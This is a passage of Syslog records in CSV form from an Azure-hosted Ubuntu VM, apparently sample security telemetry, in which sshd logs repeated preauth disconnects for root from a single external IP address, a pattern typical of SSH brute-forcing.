+19486,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 17:59:53,UbuntuDevEnv,2019-06-06 17:59:52,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 46006:11: Normal Shutdown, Thank you for playing [preauth]",9240,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,46006,,
+19487,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:00:00,UbuntuDevEnv,2019-06-06 17:59:59,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 128.199.149.61 port 50626 [preauth],9251,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,128.199.149.6,50626,,
+19488,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:00:00,UbuntuDevEnv,2019-06-06 17:59:59,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 50626:11: Normal Shutdown, Thank you for playing [preauth]",9251,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,50626,,
+19489,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:00:07,UbuntuDevEnv,2019-06-06 18:00:06,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 128.199.149.61 port 55254 [preauth],9293,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,128.199.149.6,55254,,
+19490,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:00:07,UbuntuDevEnv,2019-06-06 18:00:06,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 55254:11: Normal Shutdown, Thank you for playing [preauth]",9293,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,55254,,
+19491,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:00:14,UbuntuDevEnv,2019-06-06 18:00:13,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 128.199.149.61 port 59876 [preauth],9322,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,128.199.149.6,59876,,
+19492,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:00:14,UbuntuDevEnv,2019-06-06 18:00:13,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 59876:11: Normal Shutdown, Thank you for playing [preauth]",9322,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,59876,,
+19493,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:00:20,UbuntuDevEnv,2019-06-06 18:00:20,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 36284:11: Normal Shutdown, Thank you for playing [preauth]",9328,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,36284,,
+19494,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:00:20,UbuntuDevEnv,2019-06-06 18:00:20,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 128.199.149.61 port 36284 [preauth],9328,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,128.199.149.6,36284,,
+19495,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:00:28,UbuntuDevEnv,2019-06-06 18:00:27,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 128.199.149.61 port 40886 [preauth],9406,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,128.199.149.6,40886,,
+19496,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:00:28,UbuntuDevEnv,2019-06-06 18:00:27,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 40886:11: Normal Shutdown, Thank you for playing [preauth]",9406,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,40886,,
+19497,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:00:35,UbuntuDevEnv,2019-06-06 18:00:34,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 45514:11: Normal Shutdown, Thank you for playing [preauth]",9418,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,45514,,
+19498,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:00:35,UbuntuDevEnv,2019-06-06 18:00:34,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 128.199.149.61 port 45514 [preauth],9418,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,128.199.149.6,45514,,
+19499,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:00:41,UbuntuDevEnv,2019-06-06 18:00:41,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 50130:11: Normal Shutdown, Thank you for playing [preauth]",9433,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,50130,,
+19500,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:00:41,UbuntuDevEnv,2019-06-06 18:00:41,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 128.199.149.61 port 50130 [preauth],9433,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,128.199.149.6,50130,,
+19501,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:00:49,UbuntuDevEnv,2019-06-06 18:00:48,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 128.199.149.61 port 54754 [preauth],9444,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,128.199.149.6,54754,,
+19502,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:00:49,UbuntuDevEnv,2019-06-06 18:00:48,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 54754:11: Normal Shutdown, Thank you for playing [preauth]",9444,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,54754,,
+19503,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:00:56,UbuntuDevEnv,2019-06-06 18:00:55,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 59384:11: Normal Shutdown, Thank you for playing [preauth]",9467,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,59384,,
+19504,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:00:56,UbuntuDevEnv,2019-06-06 18:00:55,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 128.199.149.61 port 59384 [preauth],9467,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,128.199.149.6,59384,,
+19505,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:01:03,UbuntuDevEnv,2019-06-06 18:01:02,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 35772:11: Normal Shutdown, Thank you for playing [preauth]",9473,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,35772,,
+19506,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:01:03,UbuntuDevEnv,2019-06-06 18:01:02,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 128.199.149.61 port 35772 [preauth],9473,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,128.199.149.6,35772,,
+19507,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:01:10,UbuntuDevEnv,2019-06-06 18:01:09,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 40396:11: Normal Shutdown, Thank you for playing [preauth]",9486,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,40396,,
+19508,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:01:10,UbuntuDevEnv,2019-06-06 18:01:09,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 128.199.149.61 port 40396 [preauth],9486,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,128.199.149.6,40396,,
+19509,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:01:17,UbuntuDevEnv,2019-06-06 18:01:16,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 45024:11: Normal Shutdown, Thank you for playing [preauth]",9508,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,45024,,
+19510,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:01:17,UbuntuDevEnv,2019-06-06 18:01:16,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 128.199.149.61 port 45024 [preauth],9508,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,128.199.149.6,45024,,
+19511,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:01:24,UbuntuDevEnv,2019-06-06 18:01:23,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 49652:11: Normal Shutdown, Thank you for playing [preauth]",9522,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,49652,,
+19512,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:01:24,UbuntuDevEnv,2019-06-06 18:01:23,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 128.199.149.61 port 49652 [preauth],9522,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,128.199.149.6,49652,,
+19513,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:01:31,UbuntuDevEnv,2019-06-06 18:01:30,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 54274:11: Normal Shutdown, Thank you for playing [preauth]",9538,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,54274,,
+19514,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:01:31,UbuntuDevEnv,2019-06-06 18:01:30,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 128.199.149.61 port 54274 [preauth],9538,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,128.199.149.6,54274,,
+19515,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:01:38,UbuntuDevEnv,2019-06-06 18:01:37,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 58896:11: Normal Shutdown, Thank you for playing [preauth]",9545,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,58896,,
+19516,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:01:38,UbuntuDevEnv,2019-06-06 18:01:37,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 128.199.149.61 port 58896 [preauth],9545,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,128.199.149.6,58896,,
+19517,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:01:44,UbuntuDevEnv,2019-06-06 18:01:44,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 35282:11: Normal Shutdown, Thank you for playing [preauth]",9564,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,35282,,
+19518,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:01:44,UbuntuDevEnv,2019-06-06 18:01:44,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 128.199.149.61 port 35282 [preauth],9564,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,128.199.149.6,35282,,
+19519,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:01:52,UbuntuDevEnv,2019-06-06 18:01:51,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 39910:11: Normal Shutdown, Thank you for playing [preauth]",9575,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,39910,,
+19520,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:01:52,UbuntuDevEnv,2019-06-06 18:01:51,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 128.199.149.61 port 39910 [preauth],9575,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,128.199.149.6,39910,,
+19521,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:01:59,UbuntuDevEnv,2019-06-06 18:01:58,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 128.199.149.61 port 44530 [preauth],9600,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,128.199.149.6,44530,,
+19522,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:01:59,UbuntuDevEnv,2019-06-06 18:01:58,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 44530:11: Normal Shutdown, Thank you for playing [preauth]",9600,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,44530,,
+19523,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:02:05,UbuntuDevEnv,2019-06-06 18:02:05,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 128.199.149.61 port 49160 [preauth],9608,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,128.199.149.6,49160,,
+19524,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:02:05,UbuntuDevEnv,2019-06-06 18:02:05,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 49160:11: Normal Shutdown, Thank you for playing [preauth]",9608,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,49160,,
+19525,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:02:13,UbuntuDevEnv,2019-06-06 18:02:12,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 53786:11: Normal Shutdown, Thank you for playing [preauth]",9627,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,53786,,
+19526,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:02:13,UbuntuDevEnv,2019-06-06 18:02:12,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 128.199.149.61 port 53786 [preauth],9627,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,128.199.149.6,53786,,
+19527,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:02:20,UbuntuDevEnv,2019-06-06 18:02:19,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 58406:11: Normal Shutdown, Thank you for playing [preauth]",9637,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,58406,,
+19528,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:02:20,UbuntuDevEnv,2019-06-06 18:02:19,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 128.199.149.61 port 58406 [preauth],9637,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,128.199.149.6,58406,,
+19529,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:02:27,UbuntuDevEnv,2019-06-06 18:02:26,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 128.199.149.61 port 34802 [preauth],9643,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,128.199.149.6,34802,,
+19530,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:02:27,UbuntuDevEnv,2019-06-06 18:02:26,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 34802:11: Normal Shutdown, Thank you for playing [preauth]",9643,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,34802,,
+19531,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:02:33,UbuntuDevEnv,2019-06-06 18:02:33,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 39414:11: Normal Shutdown, Thank you for playing [preauth]",9656,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,39414,,
+19532,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:02:33,UbuntuDevEnv,2019-06-06 18:02:33,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 128.199.149.61 port 39414 [preauth],9656,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,128.199.149.6,39414,,
+19533,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:02:41,UbuntuDevEnv,2019-06-06 18:02:40,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 44046:11: Normal Shutdown, Thank you for playing [preauth]",9666,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,44046,,
+19534,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:02:41,UbuntuDevEnv,2019-06-06 18:02:40,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 128.199.149.61 port 44046 [preauth],9666,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,128.199.149.6,44046,,
+19535,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:02:46,UbuntuDevEnv,2019-06-06 18:02:46,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 48664:11: Normal Shutdown, Thank you for playing [preauth]",9677,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,48664,,
+19536,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:02:46,UbuntuDevEnv,2019-06-06 18:02:46,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 128.199.149.61 port 48664 [preauth],9677,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,128.199.149.6,48664,,
+19537,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:02:55,UbuntuDevEnv,2019-06-06 18:02:54,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 53298:11: Normal Shutdown, Thank you for playing [preauth]",9696,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,53298,,
+19538,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:02:55,UbuntuDevEnv,2019-06-06 18:02:54,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 128.199.149.61 port 53298 [preauth],9696,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,128.199.149.6,53298,,
+19539,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:03:01,UbuntuDevEnv,2019-06-06 18:03:00,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 57920:11: Normal Shutdown, Thank you for playing [preauth]",9707,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,57920,,
+19540,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:03:01,UbuntuDevEnv,2019-06-06 18:03:00,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 128.199.149.61 port 57920 [preauth],9707,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,128.199.149.6,57920,,
+19541,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:03:08,UbuntuDevEnv,2019-06-06 18:03:07,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 128.199.149.61 port 34320 [preauth],9716,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,128.199.149.6,34320,,
+19542,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:03:08,UbuntuDevEnv,2019-06-06 18:03:07,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 34320:11: Normal Shutdown, Thank you for playing [preauth]",9716,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,34320,,
+19543,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:03:14,UbuntuDevEnv,2019-06-06 18:03:14,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 38918:11: Normal Shutdown, Thank you for playing [preauth]",9739,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,38918,,
+19544,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:03:14,UbuntuDevEnv,2019-06-06 18:03:14,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 128.199.149.61 port 38918 [preauth],9739,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,128.199.149.6,38918,,
